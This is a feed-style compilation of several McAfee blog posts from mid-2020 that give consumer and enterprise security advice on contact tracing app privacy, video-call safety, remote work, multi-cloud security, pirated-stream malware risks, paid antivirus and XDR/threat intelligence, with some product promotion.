Apps have greatly enhanced the way consumers interact with and complete tasks on their mobile devices. But what many consumers don’t realize is that they are tracked by many of the apps they know and use daily. Tracking can stem from a variety of platforms, however one type in particular has brought this issue even more into the forefront: contact tracing apps, which can help slow the spread of COVID-19.

What Are Contact Tracing Apps?

According to MIT Technology Review, technologists have been working to build contact tracing apps and systems to identify and notify those who have come in contact with a virus carrier. Tech giants and public health authorities worldwide have quickly signed up to build the application programming interfaces (APIs) and apps necessary to support this project’s scale. However, many users are skeptical that they know very little about these apps, what data is collected, and who this data is shared with.

The success of these contact tracing apps rests on user participation. However, for these apps to make a real impact, developers must overcome potential privacy and security risks to assure individuals their data will only be used to fight the virus’ spread.

The Impact of Contact Tracing Technology

According to Health IT Security, the American Civil Liberties Union and the Electronic Frontier Foundation released reports outlining potential privacy and security risks developers should consider when building APIs and drafting privacy policies. Some of these risks include geo-location tracking or tracking a device’s location in real-time.

Then there’s user behavior to keep in mind. Some individuals may not understand the extent of the information they share with an app, while others are uneasy about the idea that the government – or a hacker – could easily access their whereabouts. What’s more, users are concerned that data collection will fail to end after the pandemic and authorities will use it in the future for unwarranted public surveillance.

While the privacy concerns around contact tracing apps are genuine, it’s also important to consider how this technology could greatly benefit public health. Although the privacy protection instilled in some apps is still a work-in-progress, some technologies have successfully contact traced without putting users’ privacy at risk. For example, Singapore’s app TraceTogether only collects and gathers data at the point that someone 1) is confirmed to have COVID-19 and 2) consents to the scraping of that data. From there, the data is anonymized, encrypted, and doesn’t reveal the identity of the infected user or the person that may have come in contact with them. What’s more, the data is deleted automatically after 21 days. By employing a thoughtful approach to contact tracing, positive strides can be made towards stopping the virus’s spread without risking user privacy.

How to Stay Secure

As a consumer living in a world riddled with uncertainty, you can take steps to help protect your digital life. When it comes to the rise of contact tracing technology and other apps you may use, here are some tips to consider to help safeguard your private information.

Understand and read the terms

Because this technology is relatively new, there is much to consider if you’re thinking about downloading a contact tracing app. Consumers can protect their privacy by reading the Privacy Policy and Terms of Service so they can know just what they’re dealing with.

Update your settings

If you’re concerned about an app having permission to access your location, photos, or other data, check your settings to see which apps have access to this information. Change permissions by either deleting the app or changing your settings on your device.

Consider other options

If you are not comfortable downloading a contact tracing app on your device but would like to be informed of the virus’ spread, you can visit the CDC’s website for COVID-19 cases, which can be narrowed down by state and county.

Stay Updated

To stay updated on all things McAfee and on top of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post How to Protect Your Privacy From Tracking Apps appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/consumer/consumer-threat-notices/how-to-protect-your-privacy-from-tracking-apps/feed/ 0
How to Keep Your Celebrations Happening – Virtually & Safely! https://www.mcafee.com/blogs/consumer/how-to-keep-your-celebrations-happening-virtually-safely/ https://www.mcafee.com/blogs/consumer/how-to-keep-your-celebrations-happening-virtually-safely/#respond Thu, 02 Jul 2020 01:38:16 +0000 /blogs/?p=102475

2020 has certainly been the year of the ‘new normal’. Our new life in which we stay home and socially distance has affected the way we work and learn but just as importantly, the way we celebrate! Without a doubt, the video call saved the day while we all stayed home and socially distanced. Work […]

The post How to Keep Your Celebrations Happening – Virtually & Safely! appeared first on McAfee Blogs.

]]>

2020 has certainly been the year of the ‘new normal’. Our new life in which we stay home and socially distance has affected the way we work and learn but just as importantly, the way we celebrate!

Without a doubt, the video call saved the day while we all stayed home and socially distanced. Work meetings continued and learning at home still happened thanks to this wonderful technology. And while some people used video calls to remain in touch with family and friends, this remarkable technology also helped many people worldwide continue to celebrate life’s important milestones such as school and university graduations; weddings and, even the celebration of life at funerals.

Graduating Virtually

One of my oldest friends has two daughters who have just virtually graduated from their high school and university. Before each occasion, the girls were sent their cap and gown and their graduation certificates via the post. On the day of each event, the girls donned their specially purchased dresses – which were purchased long before ‘lockdown’ (along with their cap and gown) – and participated in the ceremony via video call. Dressed to the 9’s, their immediate family also watched the ceremony and witnessed their daughter (and sister) officially graduate.

While there wasn’t perhaps the same sense of camaraderie as if their cohort had graduated together in person, the video call was definitely the next best thing. It allowed them to see their friends, receive the public accolades they both so deserved and, most importantly, it provided a sense of completion and closure that allowed them to start thinking about their next phase in life.

Virtual Weddings

Within weeks of lockdown, the virtual wedding industry was well established. Companies such as Simply Eloped were offering virtual wedding packages that provided planning assistance, a virtual ceremony emcee, advice on acquiring a license and tech support. Specialised tech companies were also offering to coordinate weddings on video calling apps and manage guests on multiple devices.

And if you are getting married, of course you need photography so virtual photographers became a thing as did customised wedding backdrops providers and virtual live musicians to entertain your guests. If there was ever an example of an industry that mastered the art of pivoting, it was definitely the wedding industry!

Celebrating the End Of A Life – Virtually

Probably one of the hardest milestones to miss in person during lockdown was the celebration of life – the funeral. Around the world, many countries limited attendees at funerals to as low as 10 to ensure social distancing which meant live streaming the service became the next best option.

Specialised funeral live streaming companies such as OneRoom sprung up allowing family and friends the opportunity for a private farewell even if they couldn’t attend in person.  While a funeral service is an important way to remember and celebrate the life of the recently deceased, it is also an important part of the grieving process. I have several friends who lost treasured family members during the lockdown period who were very comforted by having the option to have a copy of the live-streamed service which they could watch several times.

If there’s ever a time to be grateful for the power of technology (and video calls) it’s now! I just can’t imagine how we have all survived the isolation without being able to stay in touch and see the faces of family and friends! But just like every aspect of online life, video calling apps are fantastic when used sensibly but they do also carry some risks. Here are my top tips to ensure that you can safely celebrate life’s milestones online:

  1. Don’t Share Links to Video Calls

Whether it’s a wedding ceremony, baby shower, meeting with a virtual photographer or a funeral service, sharing links to video calls means you are essentially extending the invitation to anyone who gets their hands on the link. Not only does this compromise the privacy of everyone involved but video call ‘bombers’ have been known use threatening and intimidating language which could be very unsettling.

  1. Keep Your Personal Meeting ID Tight!

Some video calling apps allocate each user a PMI or personal meeting ID. Your PMI is basically one continuous meeting so anyone that has access to it can enter any of your future meetings or gatherings. Always generate a random meeting ID for any events where you don’t truly know your invitees.

  1. Video Calls Can Be Recorded

Don’t forget that video calls can be recorded. Even though a video call may feel like real life – it is not! So, if you are celebrating hard at your friend’s wedding, be mindful that your ‘high-energy’ behaviour may be recorded on camera!!

While ‘lockdown life’ may almost be over for some of us, many experts believe ‘social distancing’ will be a way of life for some time. So, if you have an important celebration on your radar, don’t despair – a well-planned virtual celebration can definitely be worthwhile and will be a great story to pass down to future generations!

Happy Virtual Celebrating!

Alex xx

The post How to Keep Your Celebrations Happening – Virtually & Safely! appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/consumer/how-to-keep-your-celebrations-happening-virtually-safely/feed/ 0
Best Practices for Adapting to a Remote Work Lifestyle  https://www.mcafee.com/blogs/other-blogs/life-at-mcafee/best-practices-for-adapting-to-a-remote-work-lifestyle/ https://www.mcafee.com/blogs/other-blogs/life-at-mcafee/best-practices-for-adapting-to-a-remote-work-lifestyle/#respond Wed, 01 Jul 2020 22:36:20 +0000 /blogs/?p=102274

As our world continues to evolve, we have been forced to adapt accordingly. Navigating change can be difficult for many, so here are useful tips McAfee team members have been using to improve productivity, stay healthy and help customers stay digitally secure during the pandemic.  Productivity Hacks Applying simple hacks to your routine and environment can help […]

The post Best Practices for Adapting to a Remote Work Lifestyle  appeared first on McAfee Blogs.

]]>

As our world continues to evolve, we have been forced to adapt accordingly. Navigating change can be difficult for many, so here are useful tips McAfee team members have been using to improve productivity, stay healthy and help customers stay digitally secure during the pandemic. 

Productivity Hacks

Applying simple hacks to your routine and environment can help you stay productive. Create a workspace separate from your living space if you can. One tip is to get ready and get dressed as if you were going to the office. You’ll be prepared for that video conference when you feel put together. Recreating the “comforts of office” at home with accessories like a good mouse/keyboard set, external monitor, chair and even an office plant can go a long way. When you’re done for the day, close your laptop to reinforce the separation between work and your personal life. 

While some can seamlessly continue normal workday hours, many need to juggle between being a home school principal and master chef de cuisine before being able to look at emails. Try to find a balanced routine that works for your needs—and don’t be afraid to change it. 

Ways to Focus on Wellbeing and Stay Active at Home

Many athletic and health companies have brought their classes and routines online for free so people can stay active. The exercises range in intensity and function so you can easily find something that works for you. Whether you prefer a heart-racing, 20-minute HIIT cardio workout, or a decompressing 40-minute yoga session (or both, depending on what the day brings!), there are plenty of options for staying active indoors. These exercises can also be a family bonding activity to stay active together. Additionally, meditation apps have started offering free services to help improve mental wellbeing. 

Experimenting in the kitchen may also inspire some creative, healthy cooking. With many restaurants expanding to pickup and delivery models, now is a great time to support local businesses and to try that place you’ve previously set your sights on.

Be sure to stay in touch with your community, friends and family. Check up on others via text, call, or video to see how they’re doing and spend virtual time together. This applies equally to teammates. Encouraging remote lunches and social hours helps everyone stay connected and motivated. 

Tips for Staying Digitally Secure

As you’re spending more time online, and possibly seeing more devices connected to your network, it’s a good idea to re-evaluate your home’s digital privacy and security. For starters, consider strengthening your network and internet passwords. Talk to your kids about cybercrime to make sure they remember to practice digital hygiene as they connect online for classes and socialize with friends. 

As our external environment changes, so too does the digital threat landscape. When in doubt, connect to a VPN to help keep your personal data and financial transactions safe from prying eyes. Consider using a safe browser extension to help identify illegitimate websites, especially when shopping for supplies or staying up to date on the news. Pairing security tools with best practices can help keep you and your family safer online. 

Find Balance by Building in Hobbies

There is no shortage of indoor entertainment options, including video games, online board games and TV shows. Even some museums and zoos have made tours available online. Picking up a new hobby, book or new language could be a great way to keep your mind active. Above all, we encourage you to take care of yourself and your family. 

Building hobbies and leisurely activities into your daily routine can help bring structure to your routine. Here is how our team member, Lily, is finding balance while working to keep you safe online:

“Transitioning to working from home full-time has taught me the need to establish a routine and stick to itto ensure I’m exercising, setting work hours and taking breaks. Trying to establish a routine during the first couple of weeks was a challenge at first, but now I feel more balanced. Another good tip is to always keep healthy snacks and water at your work station!” 

Want to work for a company that values employee wellbeing and helps you reach greater heights? Check out McAfee’s latest opportunities. 

The post Best Practices for Adapting to a Remote Work Lifestyle  appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/other-blogs/life-at-mcafee/best-practices-for-adapting-to-a-remote-work-lifestyle/feed/ 0
Multi-Cloud Environment Challenges for Government Agencies https://www.mcafee.com/blogs/enterprise/cloud-security/multi-cloud-environment-challenges-for-government-agencies/ https://www.mcafee.com/blogs/enterprise/cloud-security/multi-cloud-environment-challenges-for-government-agencies/#respond Wed, 01 Jul 2020 15:00:05 +0000 /blogs/?p=102376

Between January and April of this year, the government sector saw a 45% increase in enterprise cloud use, and as the work-from-home norm continues, socially distanced teamwork will require even more cloud-based collaboration services. Hybrid and multi-cloud architectures can offer government agencies the flexibility, enhanced security and capacity needed to achieve what they need for […]

The post Multi-Cloud Environment Challenges for Government Agencies appeared first on McAfee Blogs.

]]>

Between January and April of this year, the government sector saw a 45% increase in enterprise cloud use, and as the work-from-home norm continues, socially distanced teamwork will require even more cloud-based collaboration services.

Hybrid and multi-cloud architectures can offer government agencies the flexibility, enhanced security and capacity needed to achieve what they need for modernizing now and into the future. Yet many questions remain surrounding the implementation of multi- and hybrid-cloud architectures. Adopting a cloud-smart approach across an agency’s infrastructure is a complex process with corresponding challenges for federal CISOs.

I recently had the opportunity to sit with several public and private sector leaders in cloud technology to discuss these issues at the Securing the Complex Ecosystem of Hybrid Cloud webinar, organized by the Center for Public Policy Innovation (CPPI) and Homeland Security Dialogue Forum (HSDF).

Everyone agreed that although the technological infrastructure supporting hybrid and multi-cloud environments has made significant advancements in recent years, there is still much work ahead to ensure government agencies are operating with advanced security.

There are three key concepts for federal CISOs to consider as they develop multi- and hybrid-cloud implementation strategies:

  1. There is no one-size-fits-all hybrid environment

Organizations have adopted various capabilities that have unique gaps that must be filled. A clear system for how organizations can successfully fill these gaps will take time to develop. That being said, there is no one-size-fits-all hybrid or multi-cloud environment technology for groups looking to implement a cloud approach across their infrastructure.

  1. Zero-trust will continue to evolve in terms of its definition

Zero-trust has been around for quite some time and will continue to grow in terms of its definition. In concept, zero-trust is an approach that requires an organization to complete a thorough inspection of its existing architecture. It is not one specific technology; it is a capability set that must be applied to all areas of an organization’s infrastructure to achieve a hybrid or multi-cloud environment. 

  1. Strategies for data protection must have a cohesive enforcement policy

A consistent enforcement policy is key in maintaining an easily recognizable strategy for data protection and threat management. Conditional and contextual access to data is critical for organizations to fully accomplish cloud-based collaboration across teams.

Successful integration of a multi-cloud environment poses real challenges for all sectors, particularly for enterprises as large and complex as the federal government. Managing security across different cloud environments can be overwhelmingly complicated for IT staff, which is why they need tools that can automate their tasks and provide continued protection of sensitive information wherever it goes inside or outside the cloud.

At McAfee, we’ve been dedicating ourselves to solving these problems. We are excited that McAfee’s MVISION Cloud has been recognized as the first cloud access security broker (CASB) with FedRAMP High authorization. Additionally, we’ve been awarded an Other Transaction Authority by the Defense Innovation Unit to prototype a Secure Cloud Management Platform through McAfee’s MVISION Unified Cloud Edge (UCE) cybersecurity solution.

We look forward to engaging in more strategic discussions with our partners in the private and public sectors to not only discuss but also help solve the security challenges of federal cloud adoption.

The post Multi-Cloud Environment Challenges for Government Agencies appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/enterprise/cloud-security/multi-cloud-environment-challenges-for-government-agencies/feed/ 0
How Entertaining Ourselves at Home Has Become a Risky Business https://www.mcafee.com/blogs/consumer/how-entertaining-ourselves-at-home-has-become-a-risky-business/ https://www.mcafee.com/blogs/consumer/how-entertaining-ourselves-at-home-has-become-a-risky-business/#respond Wed, 01 Jul 2020 05:56:06 +0000 /blogs/?p=102409

Online entertainment is certainly having a moment. While we all stayed home and socially distanced, many of us filled our time binge-watching movies and TV series  – and wasn’t it fabulous!! But did you know that researching your next binge-watching project could actually be putting you at risk? Aussies Love TV There is no doubt […]

The post How Entertaining Ourselves at Home Has Become a Risky Business appeared first on McAfee Blogs.

]]>

Online entertainment is certainly having a moment. While we all stayed home and socially distanced, many of us filled our time binge-watching movies and TV series  – and wasn’t it fabulous!! But did you know that researching your next binge-watching project could actually be putting you at risk?

Aussies Love TV

There is no doubt that us Aussies love our TV and the statistics confirm this. With over three-quarters of Aussies watching TV and over two-thirds browsing the internet to pass the time during lockdown, we are clearly a country of screen-time professionals. And with just under a million new Aussies gaining access to a streaming service in their household, it seems everyone is doing their bit to support the entertainment industry!

But streaming isn’t cheap and can add up fast (particularly when you have multiple accounts) prompting many of us to look for free alternatives. And our desire to save a buck or two when trying to find our next binge-watching project hasn’t escaped the attention of cybercriminals who have a knack for crafting convincing scam strategies that are in sync with consumer trends.

What’s the Most Targeted Show to Search For?

McAfee analysed over 100 of the top ‘talked about’ entertainment titles available across the leading streaming providers here in Australia and identified the 10 most targeted shows (both TV and film) to search for.

The series Unorthadox and movie Ace Ventura took the top place in their respective categories as having the highest ‘web search risk’ which means cybercriminals have put a lot of effort into developing scams around these titles. Scams could include websites offering free downloads of these titles – which require you to enter your personal information – or, pirated videos that contain malware which could access the private data on your device.

Here are the top 10 riskiest shows in both categories:

Series – Australian Top 10 Most Targeted

  1. Unorthadox
  2. You
  3. Family Guy
  4. Big Mouth
  5. Homeland
  6. The Vampire Diaries
  7. Dynasty
  8. Lost
  9. Brooklyn Nine-Nine
  10. Stranger Things

Movies – Australian Top 10 Most Targeted

  1. Ace Ventura
  2. Green Book
  3. John Wick
  4. Machinist
  5. Annihilation
  6. Ex Machina
  7. A Star Is Born
  8. Fyre
  9. Lady Macbeth
  10. Bird Box

Horror and Thriller Films seem to be the trend!

It appears as though our love for horror and thriller films may be putting us in danger, with five of the top ten films most targeted by cybercriminals falling into these genres. With social distancing restrictions in place, Aussies are clearly seeking to add some thrill back into their lives which has opened up new opportunities for cybercriminals. Consumers need to be careful when it comes to searching for stimulating content to escape reality to ensure it doesn’t translate to real-life malware horror.

How You Can Stay Safe While Binge-Watching At Home

Now, I want to make it very clear – this news doesn’t mean you need to give up nights on the couch. Not at all! Instead, just follow a few simple steps and you can continue binge-watching till your heart is content!

Here are my top tips for staying safe:

  1. Be Careful What You Click –if you are looking to catch up on the latest season of You or A Star is Born, please only access entertainment content directly from a reliable source. The safest thing to do is to subscribe to a streaming site that offers the content or download the movie from sources like iTunes or Amazon, instead of downloading a “free” version from a website that could contain malware.
  2. Do NOT use Illegal Streaming Sites – this is not negotiable! Many illegal streaming sites are riddled with malware disguised as pirated video files. Malware could cause you a world of pain. Not only could it cause your device to freeze or crash, it could steal sensitive information and give cybercrims unauthorized access to system resources. So, do your device a favor and stream your favourite show from a reputable source.
  3. Protect your Online Life with a Cybersecurity Solution –why not send your regards to malicious actors with a comprehensive security solution like McAfee Total Protection. This can help protect you from malware, phishing attacks, and other threats. It also includes McAfee WebAdvisor, which helps alert users of malicious websites.

So, when you are looking for your next binge-watching project, please take a moment before you download. Ensure the site you are accessing content from is legit (have you heard of it before? is it offering something for free when every other streaming service has a fee?) and if you are even a little unsure that it doesn’t look professional then DON’T click! The last thing you want is a bonus virus to interrupt your night in on the couch!

Happy Watching!!

Alex xx

 

 

 

 

The post How Entertaining Ourselves at Home Has Become a Risky Business appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/consumer/how-entertaining-ourselves-at-home-has-become-a-risky-business/feed/ 0
Why Should You Pay for a Security Solution? https://www.mcafee.com/blogs/consumer/why-should-you-pay-for-a-security-solution/ https://www.mcafee.com/blogs/consumer/why-should-you-pay-for-a-security-solution/#comments Tue, 30 Jun 2020 22:39:50 +0000 /blogs/?p=102367 Safe Online Dating

Do you ever go a single day without using a digital device? The answer is probably not. According to the Digital 2019 report by Hootsuite and We Are Social, users spend almost 7 hours a day online. And due to the recent stay-at-home orders, that number has only increased (internet hits recently surged between 50% to 70%). What’s more, U.S. […]

The post Why Should You Pay for a Security Solution? appeared first on McAfee Blogs.

]]>
Safe Online Dating

Do you ever go a single day without using a digital device? The answer is probably not. According to the Digital 2019 report by Hootsuite and We Are Social, users spend almost 7 hours a day online. And due to the recent stay-at-home orders, that number has only increased (internet hits recently surged between 50% to 70%). What’s more, U.S. households are now estimated to have an average of 11 connected devices – that’s almost 3 devices per person in my family!  

As the use of devices, apps, and online services increases daily, so do the number of online threats consumers face. That’s why it is important users consider what the best method is for securing their digital life 

My advice? Use a comprehensive security solution (and I’m not only saying this because I work for McAfee). Here’s why. 

The Limitations of Free Security Tools

Let’s be real – we all love free stuff (Costco samples anyone?). However, when it comes to my family’s security, am I willing to risk their safety due to the limitations of free solutions?  

Free tools simply don’t offer the level of advanced protection that modern technology users need. Today’s users require solutions that are as sophisticated as the threats they face, including everything from new strains of malware to hacking-based attacks. These solutions also quite literally limit consumers’ online activity too, as many impose limits on which browser or email program the user can leverage, which can be inconvenient as many already have a preferred browser or email platform (I know I do).  

Free security solutions also carry in-app advertising for premium products or, more importantly, may try to sell user data. Also, by advertising for premium products, the vendor indirectly admits that a free solution doesn’t provide enough security. These tools also offer little to no customer support, leaving users to handle any technical difficulties on their own. What’s more, most free security solutions are meant for use on only one device, whereas the average consumer owns over three connected devices. 

Security should provide a forcefield that covers users in every sense of the word – the devices they use, where they go online, how they manage and store information, and their personal data itself 

Connected Consumers Need Comprehensive Solutions

Today’s users need more than just free tools to live their desired digital life. To truly protect consumers from the evolving threat landscape, a security solution must be comprehensive. This means covering not only the user’s computers and devices, but also their connections and online behaviors. Because today’s users are so reliant on their devices and connections to bridge the gap between themselves and the outside world, security solutions must work seamlessly to shield their online activity – so seamlessly that they almost forget the solution is there. This provides the user with the protection they need without the added distractions of in-app advertising or the constant worry that their subpar solution might not secure them from common online threats.  

Why McAfee Matters

Free security products might provide the basics, but a comprehensive solution can protect the user from a host of other risks that could get in the way of living their life to the fullest. McAfee knows that users want to live their digital lives free from worry. That’s why we’ve created a line of products to help consumers do just that. With McAfee® Total Protection, users can enjoy robust security software with a comprehensive, yet holistic approach to protection.  

First, consumers are safeguarded from malware with cloud-based threat protection that uses behavioral algorithms to detect new threats – specifically protecting the device and web browsing. The software’s detection capabilities are constantly being updated and enhanced, without compromising the performance of users’ devices.  

McAfee also provides users with protection while surfing the web, where they can face a minefield of malicious ads or fraudulent websites. These pesky threats are designed to download malware and steal private information. That’s why McAfee® LiveSafe and McAfee® Total Protection include McAfee® WebAdvisor – web protection that enables users to sidestep attacks before they happen with clear warnings of risky websites, links, and files. They also include McAfee® Identity Theft Protection, which helps users stay ahead of fraud with Dark Web monitoring and SSN Trace to see if personal information has been put at risk 

Finally, we can’t forget about the importance of mobile threat detection, given that consumers spend nearly half of their online time via their mobile devices. Hackers are fully aware that we live in a mobile world, and coincidentally they’ve stepped up mobile attacks. That’s why McAfee solutions provide multi-device protection so you can safely connect while on the go.  

With robust, comprehensive security in placeyour family’s devices will be consistently protected from the latest threats in the ever-evolving security landscape. With all these devices safeeveryone’s online life is free from worry.   

Stay Updated

To stay updated on all things  McAfee  and on top of the latest consumer and mobile security threats, follow @McAfee_Homeon Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook. 

The post Why Should You Pay for a Security Solution? appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/consumer/why-should-you-pay-for-a-security-solution/feed/ 1
McAfee XDR: Taking Threat Detection and Response to a New Level https://www.mcafee.com/blogs/enterprise/endpoint-security/mcafee-xdr-taking-threat-detection-and-response-to-a-new-level/ https://www.mcafee.com/blogs/enterprise/endpoint-security/mcafee-xdr-taking-threat-detection-and-response-to-a-new-level/#respond Mon, 29 Jun 2020 21:43:52 +0000 /blogs/?p=102286

In the battle to protect digital data, the stakes have never been higher, and the outcome has never been more uncertain. Enterprises face ever-changing threats to their digital assets both inside and outside the traditional network perimeter from sophisticated threat actors, who use a changing assortment of techniques to find ways to skirt traditional security […]

The post McAfee XDR: Taking Threat Detection and Response to a New Level appeared first on McAfee Blogs.

]]>

In the battle to protect digital data, the stakes have never been higher, and the outcome has never been more uncertain.

Enterprises face ever-changing threats to their digital assets both inside and outside the traditional network perimeter from sophisticated threat actors, who use a changing assortment of techniques to find ways to skirt traditional security controls.

It’s also increasingly difficult for SOC teams to stay ahead of the attackers. Too often, they rely on an assortment of disconnected security tools and data sets supplied by different vendors. This is a flawed approach that requires multiple tools and consoles, driving up cost and the resources to make sense of the sea of data, leaving organizations with less visibility and manageability.

Many organizations still rely on EDR systems to get information about attacks against their endpoints that may be undetected or unclassified by traditional EPP solutions. However, enterprises nowadays require an extended protective umbrella that can defend not just legacy endpoints, but also mobile, and cloud workloads – all without overburdening in-house staff or requiring even more resources. Detecting today’s advanced threats requires more than a collection of point solutions. SOCs need a platform that intelligently reveals advanced adversaries leading to better, faster security outcomes.

The Rise of XDR

Companies simply can’t afford not to have full visibility into who’s trying to attack them. Here is where the deployment of Extended Detection and Response (XDR) can have a powerful security impact. XDR isn’t a single product. Rather, it refers to an assembly of multiple security products (and services) that comprise a unified platform.

Gartner defines XDR as a SaaS-based, security threat detection and incident response tool that natively integrates different security products into a cohesive security operations system. That’s a mouthful, but in practice, XDR makes the job of defenders easier by delivering a full complement of security capacities – everything from asset discovery and threat detection to vulnerability assessment, investigation and response. We see how detection efficacy drops when multiple platforms and consoles are required to identify and remediate threats. But with XDR, defenders have a single pane view into their environment across different platforms, both on-prem as well as in the cloud.

It also changes the nature of threat-hunting. Consider an organization that’s using a SIEM. While the system collects information in batches – typically from non-endpoint data sources and security countermeasures –  that isn’t the same as delivering real-time results. Even if SOC teams try to get faster answers by stitching together custom tools to correlate data, they still lag behind the attackers.

By contrast, an XDR platform will offer access in real time to all necessary telemetry to conduct a hunt and retrieve results in seconds. That helps defenders streamline the process of triage and investigation and unlock insights that were previously unimaginable using previous security tools.

Making a Difference

XDR is not a bullet-point discussion. We’re talking about different needs, delivered in different ways, and for different customers and leveraging a unique set of multi-vendor sensors and countermeasures for each.

This is where a trusted partner with a broad portfolio makes all the difference in that customer journey. As cybercriminals and groups acting on behalf of nation-states step up their nefarious activities, the outcome of this struggle against bad actors turns on speed, reliability, and predictable security outcomes.

An innovator in this field, McAfee is particularly suited to help customers to meet that challenge with a sophisticated intelligence-driven security platform. As Gartner noted earlier this year in a wide-ranging report on XDR, McAfee’s approach leverages a deep technological understanding of the relationships in the underlying data to help speed rapid out-of-the box integration.

McAfee’s XDR also benefits from a rich security legacy and a deep product portfolio. We’re also uniquely equipped to provide actionable intelligence on security threats because we can access over one billion global sensors across devices, networks and in the cloud.

The mobilization of that full complement of security capabilities delivers more complete threat detection, investigation, and response than any other security provider. For instance, when enterprises implement the security products that comprise McAfee’s XDR solution, they also benefit from the following:

  • AI and Expert System Security Analytics
  • A single interface for detections at the endpoint, sandbox, network, Internet perimeter/edge/gateway, and cloud
  • Accurate threat prioritization that helps predict potential impact as well as any countermeasures to foil an attack – the only solution that does this in a concurrent manner
  • Combined threat and detection data from your environment for richer, more meaningful alerts as well as prescriptive configuration suggestions to improve protection efficiency
  • More context and intelligent correlation leading to faster detection and higher fidelity alerts

The upshot is that McAfee XDR dramatically reduces the time defenders need to detect, contain, and respond to threats. Our AI and Big Data analytics capabilities supplies SOCs with threat and campaign insights before an attack changes course, so they avoid wasting time chasing false positives. Defenders get fewer and more meaningful alerts, making it easier to prioritize their response based on the severity and potential impact of a threat.

In a nutshell: McAfee XDR delivers a complete platform that provides SOCs visibility into how threats are impacting your key business processes, prioritization of response and delivers a full-integrated platform of security technologies.

While it may still not be ready for prime time,  XDR is poised to become an important part of the unfolding security story this year and beyond as more enterprises move their information to the cloud. It’s also why having an experienced partner by your side to help unlock the full benefits of a cohesive, unified security incident detection and response platform has never been more important.

For more information visit: mcafee.com/XDR

The post McAfee XDR: Taking Threat Detection and Response to a New Level appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/enterprise/endpoint-security/mcafee-xdr-taking-threat-detection-and-response-to-a-new-level/feed/ 0
Meaningful Context for Your Endpoint Threat Investigations https://www.mcafee.com/blogs/enterprise/endpoint-security/meaningful-context-for-your-endpoint-threat-investigations/ https://www.mcafee.com/blogs/enterprise/endpoint-security/meaningful-context-for-your-endpoint-threat-investigations/#respond Mon, 29 Jun 2020 18:16:04 +0000 /blogs/?p=102262

Threat intelligence (TI) — the art of distilling down everything that is happening globally in the adversarial threatscape and TI Programs – reducing  to what is necessary context for your company and your security team to know and take mitigation action against — is hard. Yet, many companies continue to try and create a threat intelligence capability from the ground up and find that their TI programs are not what they really want it to be. No wonder, then, […]

The post Meaningful Context for Your Endpoint Threat Investigations appeared first on McAfee Blogs.

]]>

Threat intelligence (TI) — the art of distilling down everything that is happening globally in the adversarial threatscape and TI Programs – reducing  to what is necessary context for your company and your security team to know and take mitigation action against — is hard. Yet, many companies continue to try and create a threat intelligence capability from the ground up and find that their TI programs are not what they really want it to be. No wonder, then, that while 64% of companies say they have threat-intelligence programs, only 36% believe they would catch a sophisticated attacker, according to an Ernst & Young report on cyber threat intelligence What is causing the disconnect in effectiveness of those TI programs? 

A significant portion of the problem with TI is that the human analysts must absorb the global TIprioritize it for their organization, and then locally-operationalize any intelligence relevant to their company – and that’s not easy! Having access to TI is only the first step on the road to adding context to events that your team is seeing inside the network. Turning external threat feeds or data from a Threat Intelligence Program (TIP) into useful context for security teams – and then connecting that context to individual actions and projects – takes time and resources to produce results. The process is often slow and resource-intensivefurther delaying detection. Less than 20% of breaches are stopped in a timely fashion (e.g. in a matter of hours), according to VerizonWorse than that, knowing about a threat before you encounter it (e.g. a Campaign) and then being breached while you’re still working on proactively tuning your countermeasures against that threat would be disastrousA lack of timely, actionable context from TI is therefore a main contributor to NOT being proactively prepared for an attackIs there any way to produce actionable context, appropriate for your organization, in a timely and resource-efficient manner? Is there any way to expand that context to threats NOT in your environment but are headed your way?  

Threat Intelligence Context: Leverage EDR or not? 

As companies continue to deploy endpoint detection and response (EDR) on users’ machines, security teams are recognizing that the technology can detect anomalous behavior on the endpoint. But determining the degree to which those activities constitute a real threat that matters to you requires more context. Without the context to interpret whether an activity on the system is malicious or benign, companies are limited in their ability to do Threat Hunting[Sidebar] Define Threat Hunting: Threat hunting is the practice of proactively searching for cyber threats that are hidden, undetected, in an organization’s environment. 

Without context sensitive threat intelligence integrated with EDR, SOC teams are reduced to endlessly searching for endpoint events for known IOCs associated with adversaries and then manually doing cross-correlation to external TI. They have no way to automatically cross-correlate these events with known adversarial activities or known adversarial TTPs (e.g. like knowing the C&C IP address), and they end up having a very low signal-to-noise (SN) ratio where they waste lots of time investigating things that turn out to be a nothing- because they miss all the TI correlationsHaving a way to incorporate TI in a contextual manner would really improve the signal-to-noise ratio and make the SOC team much more effective 

That’s where effective TI integration comes into play and separates effective TI programs from ineffective TI programs. With properly integrated TI, you should have easy access into things like crowdsourced attack data that identifies Tactics, Techniques and Procedures (TTPs.) Once new TTPs have been identified by the Cyber Intelligence Community, this gives threat hunters an easy, high-fidelity way to look for specific attack behaviors in the organization’s environment, knowing what attacks those TTPs are related toWith this kind of TI integration, the Security Operations Center (SOC) can more quickly identify threats and be able to dramatically improve the signal-to-noise ratio for accurately prioritized investigations. However, I would argue that this is just table stakes. What and how can we take TI integration to the next level?  

A truly superior TI Integration would additionally provide prioritization of known threats based on things like whether the threat is targeting your industry sector and geography and most-importantly, predict  the risk of your environment getting impacted by the threat. This actionable TI would offer countermeasures and prescribe what you need to do if the countermeasures are predicted to be ineffective. With this next level of TI integration, the Security Operations Center (SOC) can actually move to being more proactive, by automating the analysis of threats that haven’t even been encountered by the organization. The organization is now prepared for attacks that EDR hasn’t even seen yet!  

Reality check here, how many organizations have this level of context and integration on threats? Not many.  

The ones I am aware of today, are the current McAfee customers who participated in our Joint Development Program for MVISION Insights this past quarter.  

McAfee has created its MVISION Insights service to provide a superiorintegrated TI so that security teams can prioritize and predict threats by cross-correlating known campaigns using industry and geographical threat activity with one’s own  security posture derived from their security telemetry, and prescribe the mosteffective way of dealing with the threat. This kind of solution empowers the SOC to move beyond manual TI cross-correlation and move to much more easily prioritizing threats that matter and moving from being reactive to being a lot more proactive.  

